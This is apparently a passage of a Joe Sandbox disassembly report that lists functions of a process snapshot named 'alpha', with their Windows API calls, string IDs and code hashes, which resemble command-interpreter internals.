                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                          • API String ID: 975110957-381716982
                                                                                                                                                                                                                          • Opcode ID: c3d9bae626d4da60ca0935425bb6b8769f757670fbe2173955210a54d252207d
                                                                                                                                                                                                                          • Instruction ID: ff18c2f33edf319a1beed9dba1d8b4c09b5c85ad4e4478cdb18b74848cb07209
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d9bae626d4da60ca0935425bb6b8769f757670fbe2173955210a54d252207d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DC1CF72A082159BDF24CFA8D881AEEBBB1FF18714F14406AE848E7751DB709D41CB64
                                                                                                                                                                                                                          Function 0019B760 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _tell.MSVCRT ref: 0019B7F9
                                                                                                                                                                                                                          • _close.MSVCRT ref: 0019B82C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019B8CC
                                                                                                                                                                                                                          • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0019B936
                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 0019B947
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0019B96D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                          • String ID: GOTO
                                                                                                                                                                                                                          • API String ID: 1380661413-1693823284
                                                                                                                                                                                                                          • Opcode ID: b8b790debee8da43e3979650569ed053229e41ebb09f26e748dbab18eb759e79
                                                                                                                                                                                                                          • Instruction ID: 03939583d783dc55da4c4b66f6490271f61007ad744c10e8fa332985f0c9f715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b790debee8da43e3979650569ed053229e41ebb09f26e748dbab18eb759e79
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11B1F170A093018FDF24DF68E98476AB7E6BF95714F14092DE886C7290EB70DD85CB92
                                                                                                                                                                                                                          Function 001B6650 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 214registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 001B6745
                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 001B67CF
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B67F6
                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001920B8,00000000,00000002,?,00000000), ref: 001B6867
                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 001B68A3
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B68C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command$p~du
                                                                                                                                                                                                                          • API String ID: 4081037667-3069096257
                                                                                                                                                                                                                          • Opcode ID: 719e2dfde721f7f962707f1e8e033b96e0b3ec8334148fbcce027b820eb6b524
                                                                                                                                                                                                                          • Instruction ID: e7973fdbdcae8c3cd68b8a73d8442c57430e537d150f72e99a2a4977e74d8933
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 719e2dfde721f7f962707f1e8e033b96e0b3ec8334148fbcce027b820eb6b524
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51613C75E002259BDF349B24CC49AFB77B9EF64700F1501AAFC49E3290EB759E80CA91
                                                                                                                                                                                                                          Function 001A3065 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                                                                                                          • String ID: +-~!
                                                                                                                                                                                                                          • API String ID: 2191331888-2604099254
                                                                                                                                                                                                                          • Opcode ID: 0e9118e6e5838e070c0feab983ba48021422a8298914ce3d04bcebc0326d6630
                                                                                                                                                                                                                          • Instruction ID: 917607b87572047b69e601092c1d0cff33b8c1f5866df493dea7564d4ed0a357
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e9118e6e5838e070c0feab983ba48021422a8298914ce3d04bcebc0326d6630
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE519079401209EFCB04DF64E945AEB37A5EF06320F15812AFC269B150EBB4DF45DBA1
                                                                                                                                                                                                                          Function 001B7220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B7277
                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 001B72AA
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B72BD
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 001B72EF
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B7304
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B7311
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                                                                                                                                                          • String ID: $%04X-%04X$\
                                                                                                                                                                                                                          • API String ID: 4001382275-467840296
                                                                                                                                                                                                                          • Opcode ID: 34297c90ceceef9b6ed869f6006ab82807f2617b252ce2388b8fb213080d0ab1
                                                                                                                                                                                                                          • Instruction ID: 3f76b291a5cc56a9b3f41b672c292dd81b94968aa3647daa3f47f13c1f6683ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34297c90ceceef9b6ed869f6006ab82807f2617b252ce2388b8fb213080d0ab1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5941D971608310AADB24ABA59C0AEBB77ECEFD4B10F44441EF949D61D0E7709940D6B2
                                                                                                                                                                                                                          Function 001B64DB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 128registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B650F
                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00), ref: 001B6545
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6553
                                                                                                                                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6590
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65AD
                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001920B8,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65D4
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B65EF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                          • String ID: %s=%s$p~du
                                                                                                                                                                                                                          • API String ID: 1019019434-193987542
                                                                                                                                                                                                                          • Opcode ID: 7776d419220933b99359c7afb5957e7a2dfd920c99a414fda60baabcdba0fb39
                                                                                                                                                                                                                          • Instruction ID: caa973ed55fdcae73249f47115fa621367c75b4e0666a215e1e86b3a81af7e07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7776d419220933b99359c7afb5957e7a2dfd920c99a414fda60baabcdba0fb39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41E272D01215ABDF31AB55CC09EEF7B78EFA9F90F01011AF80577294D72A5E01CAA0
                                                                                                                                                                                                                          Function 001B2D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,001B3877), ref: 001B2D31
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                                                                                          • String ID: wil
                                                                                                                                                                                                                          • API String ID: 24740636-1589926490
                                                                                                                                                                                                                          • Opcode ID: 8f75f63e60e3e2b0063ab9330888f76b0f5e9eb097a418ffad643db2dc029dd3
                                                                                                                                                                                                                          • Instruction ID: 8c8fdfbf344350b4ad949115a644a4805245f767f87a608b4958c64cb60053c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f75f63e60e3e2b0063ab9330888f76b0f5e9eb097a418ffad643db2dc029dd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F731B530305204ABEB249BA2CC89BFB376EEF41351FB04436F912D6690D778CD499662
                                                                                                                                                                                                                          Function 001B832A Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 001B8360
                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 001B8376
                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 001B838B
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 001B83A0
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 001B83D8
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 001B840C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                          • String ID: (#$Application$System
                                                                                                                                                                                                                          • API String ID: 3377411628-593978566
                                                                                                                                                                                                                          • Opcode ID: 9035a48bccf0a57c8bc05398e181245a6dc50fb3eb48e69a0ed5e1e0cd640ac6
                                                                                                                                                                                                                          • Instruction ID: 71c4037a698d23600a7892982e8975983a298ee962ad131bd170906928c789aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9035a48bccf0a57c8bc05398e181245a6dc50fb3eb48e69a0ed5e1e0cd640ac6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9314971A00208ABDF10DFB5CC44EEEBBBDEB49B10F50412AF811E7191EB309A45CB61
                                                                                                                                                                                                                          Function 001A5271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A5294
                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001A52A4
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1036
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1048
                                                                                                                                                                                                                          • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1064
                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,001A5134,-00000001), ref: 001B1073
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                          • String ID: :$\
                                                                                                                                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                          • Opcode ID: 83e14385beeac1fc6a44a02181153361f260802200958e6c0992155e6dbde1d3
                                                                                                                                                                                                                          • Instruction ID: 51b8972f661e5154cac31daec0f38f423b801ae4c789989abb00ea37d73fe0a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83e14385beeac1fc6a44a02181153361f260802200958e6c0992155e6dbde1d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7711EC39A06614EB8720AB349C487BF77B9EF47750746411BF812D2190DB748DC5D1A1
                                                                                                                                                                                                                          Function 001A161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A1665
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A1689
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A16AD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A16D1
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A17CF
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A17E9
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A1801
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001A1813
                                                                                                                                                                                                                            • Part of subcall function 001A260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001A1775,-00000001,-00000001,-00000001,-00000001), ref: 001A2650
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1034426908-0
                                                                                                                                                                                                                          • Opcode ID: 665d6f433dfc36feb3c0c7e1bc9082284163271c48f18edb5728bef217a8b053
                                                                                                                                                                                                                          • Instruction ID: 20bb3ac8d2d9677cc6dd03287730c1ca0936ed741e4ae68d7a18423785911ff6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665d6f433dfc36feb3c0c7e1bc9082284163271c48f18edb5728bef217a8b053
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F18C75A04219ABDF28DF64CC85AAABBF5FF15304F1441A9E849D7241EB34EE81CF90
                                                                                                                                                                                                                          Function 001B45F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,001B9E02,?,?,001B9E02), ref: 001B4618
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4637
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CA7F0,001B9E02,?,00000000,?,001B9E02), ref: 001B4646
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4653
                                                                                                                                                                                                                          • memcmp.MSVCRT(001CA7F0,001934F8,00000003), ref: 001B4693
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,001B9E02,00000000,?,001B9E02,?,001B9E02), ref: 001B4720
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,001B9E02,00000000,00000000,?,001B9E02), ref: 001B4742
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B474F
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F1,00000001,?,00000000,?,001B9E02), ref: 001B4764
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,001B9E02), ref: 001B4771
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2002953238-0
                                                                                                                                                                                                                          • Opcode ID: d5ba16d42a0c8092541e04c9789b2a925da589ef7746094ace1cf535ff0e49e8
                                                                                                                                                                                                                          • Instruction ID: f30fc4a41e2a8be3dd22824abc6c19ddea696cbce2076a3298499ba68ac0d6c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ba16d42a0c8092541e04c9789b2a925da589ef7746094ace1cf535ff0e49e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351F371A41204AFDF218F68CC49BBEBBB9EF52710F18815AF851DB291DB718D80CB51
                                                                                                                                                                                                                          Function 0019C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,001CA7F0,00000000,?,00000200), ref: 0019C818
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0019C882
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019C8BA
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019C8C4
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019C8DB
                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019C8ED
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0019C90D
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019C91E
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CA7F0,00000200,00000000,00000000), ref: 0019C934
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 0019C941
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019CAC4
